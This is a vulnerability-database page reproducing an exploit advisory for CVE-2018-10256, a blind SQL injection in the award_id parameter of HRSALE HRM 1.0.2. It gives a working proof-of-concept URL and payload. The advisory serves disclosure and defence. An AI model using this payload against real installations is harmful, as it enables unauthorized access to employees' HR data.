Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-10256

Publish Date: 26 Apr 2018

Author: 8bitsec

Source

                							

                # Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10256
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
 
Release Date:
=============
2018-04-23
 
Product &amp; Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
 
Technical Details &amp; Description:
================================
 
SQL injection on [award_id] parameter.
 
Proof of Concept (PoC):
=======================
 
SQLi:
 
https://localhost/[path]/admin/user/read_awards/?jd=1&amp;is_ajax=1&amp;mode=modal&amp;data=view_award&amp;award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
 
Parameter: award_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jd=1&amp;is_ajax=1&amp;mode=modal&amp;data=view_award&amp;award_id=1' AND 1303=1303 AND 'BzpS'='BzpS


<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

HRSALE The Ultimate HRM 1.0.2 SQL Injection

Vulmon Search

About

Products

Connect